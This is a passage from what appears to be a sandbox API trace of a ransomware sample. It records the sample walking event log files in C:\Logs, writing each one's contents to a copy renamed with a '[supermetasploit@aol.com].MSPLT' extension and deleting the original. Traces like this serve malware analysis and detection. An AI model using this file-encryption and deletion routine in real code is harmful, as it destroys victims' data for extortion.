lstrlenW (lpString=".rar") returned 4 [0292.560] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString=".bz2") returned 4 [0292.560] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString=".7z") returned 3 [0292.560] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.560] lstrlenW (lpString=".dbf") returned 4 [0292.560] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.560] lstrlenW (lpString=".1cd") returned 4 [0292.560] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0292.561] lstrlenW (lpString=".jpg") returned 4 [0292.561] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.561] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.561] lstrlenW (lpString="Microsoft-Windows-Ntfs%4WHC.evtx") returned 32 [0292.561] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.562] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0292.562] CloseHandle (hObject=0x480) returned 1 [0292.562] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 0x20 [0292.562] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.562] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.562] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.562] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.562] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0292.626] GetLastError () returned 0x0 [0292.626] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.686] WriteFile (in: hFile=0x48c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.689] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.689] WriteFile (in: hFile=0x48c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x114, lpOverlapped=0x0) returned 1 [0292.689] SetEndOfFile (hFile=0x48c) returned 1 [0292.716] CloseHandle (hObject=0x48c) returned 1 [0292.760] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.760] SetEndOfFile (hFile=0x480) returned 1 [0292.843] CloseHandle (hObject=0x480) returned 1 [0292.844] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.844] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 1 [0292.845] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.845] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.845] lstrlenW (lpString=".doc") returned 4 [0292.845] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.845] lstrlenW (lpString=".docx") returned 5 [0292.845] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.845] lstrlenW (lpString=".pdf") returned 4 [0292.845] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.845] lstrlenW (lpString=".xls") returned 4 [0292.845] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.845] lstrlenW (lpString=".xlsx") returned 5 [0292.845] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.845] lstrlenW (lpString=".ppt") returned 4 [0292.845] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.845] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.845] lstrlenW (lpString=".zip") returned 4 [0292.845] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString=".rar") returned 4 [0292.846] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString=".bz2") returned 4 [0292.846] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString=".7z") returned 3 [0292.846] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.846] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.846] lstrlenW (lpString=".dbf") returned 4 [0292.846] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.846] lstrlenW (lpString=".1cd") returned 4 [0292.846] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.846] lstrlenW (lpString=".jpg") returned 4 [0292.846] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.846] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.846] lstrlenW (lpString=".doc") returned 4 [0292.846] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.846] lstrlenW (lpString=".docx") returned 5 [0292.846] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.846] lstrlenW (lpString=".pdf") returned 4 [0292.847] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString=".xls") returned 4 [0292.847] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString=".xlsx") returned 5 [0292.847] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.847] lstrlenW (lpString=".ppt") returned 4 [0292.847] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.847] lstrlenW (lpString=".zip") returned 4 [0292.847] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString=".rar") returned 4 [0292.847] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString=".bz2") returned 4 [0292.847] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString=".7z") returned 3 [0292.847] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.847] lstrlenW (lpString=".dbf") returned 4 [0292.847] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.847] lstrlenW (lpString=".1cd") returned 4 [0292.847] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0292.848] lstrlenW (lpString=".jpg") returned 4 [0292.848] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.848] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.848] lstrlenW (lpString="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 64 [0292.848] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.849] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0292.850] CloseHandle (hObject=0x480) returned 1 [0292.850] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 0x20 [0292.850] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.850] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.850] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0292.852] GetLastError () returned 0x0 [0292.852] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.857] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.861] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.861] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x154, lpOverlapped=0x0) returned 1 [0292.861] SetEndOfFile (hFile=0x468) returned 1 [0292.861] CloseHandle (hObject=0x468) returned 1 [0292.865] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.865] SetEndOfFile (hFile=0x480) returned 1 [0292.867] CloseHandle (hObject=0x480) returned 1 [0292.867] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.867] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 1 [0292.868] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.868] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.868] lstrlenW (lpString=".doc") returned 4 [0292.868] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.868] lstrlenW (lpString=".docx") returned 5 [0292.868] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.868] lstrlenW (lpString=".pdf") returned 4 [0292.868] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.868] lstrlenW (lpString=".xls") returned 4 [0292.868] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.868] lstrlenW (lpString=".xlsx") returned 5 [0292.868] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.868] lstrlenW (lpString=".ppt") returned 4 [0292.869] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString=".zip") returned 4 [0292.869] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString=".rar") returned 4 [0292.869] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString=".bz2") returned 4 [0292.869] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString=".7z") returned 3 [0292.869] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString=".dbf") returned 4 [0292.869] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString=".1cd") returned 4 [0292.869] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString=".jpg") returned 4 [0292.869] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.869] lstrlenW (lpString=".doc") returned 4 [0292.869] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.869] lstrlenW (lpString=".docx") returned 5 [0292.870] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.870] lstrlenW (lpString=".pdf") returned 4 [0292.870] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString=".xls") returned 4 [0292.870] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString=".xlsx") returned 5 [0292.870] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.870] lstrlenW (lpString=".ppt") returned 4 [0292.870] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.870] lstrlenW (lpString=".zip") returned 4 [0292.870] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString=".rar") returned 4 [0292.870] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString=".bz2") returned 4 [0292.870] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString=".7z") returned 3 [0292.870] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.870] lstrlenW (lpString=".dbf") returned 4 [0292.870] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.870] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.870] lstrlenW (lpString=".1cd") returned 4 [0292.871] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0292.871] lstrlenW (lpString=".jpg") returned 4 [0292.871] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.871] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.871] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Debug.evtx") returned 41 [0292.871] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.873] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=1052672) returned 1 [0292.873] CloseHandle (hObject=0x480) returned 1 [0292.874] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 0x20 [0292.874] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.874] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0292.874] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.874] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.874] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0292.875] GetLastError () returned 0x0 [0292.875] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0293.302] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0293.460] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1010, lpOverlapped=0x0) returned 1 [0293.470] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1020, lpOverlapped=0x0) returned 1 [0293.474] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.474] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x126, lpOverlapped=0x0) returned 1 [0293.474] SetEndOfFile (hFile=0x468) returned 1 [0294.157] CloseHandle (hObject=0x468) returned 1 [0294.534] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.534] SetEndOfFile (hFile=0x480) returned 1 [0294.535] CloseHandle (hObject=0x480) returned 1 [0294.535] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.536] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 1 [0294.536] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.536] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.536] lstrlenW (lpString=".doc") returned 4 [0294.536] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.536] lstrlenW (lpString=".docx") returned 5 [0294.536] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.536] lstrlenW (lpString=".pdf") returned 4 [0294.536] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.537] lstrlenW (lpString=".xls") returned 4 [0294.537] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.537] lstrlenW (lpString=".xlsx") returned 5 [0294.537] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.537] lstrlenW (lpString=".ppt") returned 4 [0294.537] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.537] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.537] lstrlenW (lpString=".zip") returned 4 [0294.538] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString=".rar") returned 4 [0294.538] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString=".bz2") returned 4 [0294.538] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString=".7z") returned 3 [0294.538] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.538] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.538] lstrlenW (lpString=".dbf") returned 4 [0294.538] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.538] lstrlenW (lpString=".1cd") returned 4 [0294.538] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.538] lstrlenW (lpString=".jpg") returned 4 [0294.538] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.538] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.539] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.539] lstrlenW (lpString=".doc") returned 4 [0294.539] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".docx") returned 5 [0294.539] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.539] lstrlenW (lpString=".pdf") returned 4 [0294.539] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".xls") returned 4 [0294.539] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".xlsx") returned 5 [0294.539] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.539] lstrlenW (lpString=".ppt") returned 4 [0294.539] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.539] lstrlenW (lpString=".zip") returned 4 [0294.539] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".rar") returned 4 [0294.539] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".bz2") returned 4 [0294.539] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString=".7z") returned 3 [0294.539] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.539] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.539] lstrlenW (lpString=".dbf") returned 4 [0294.539] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.539] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.539] lstrlenW (lpString=".1cd") returned 4 [0294.540] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.540] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0294.540] lstrlenW (lpString=".jpg") returned 4 [0294.540] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.540] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.540] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 70 [0294.540] CreateFileW 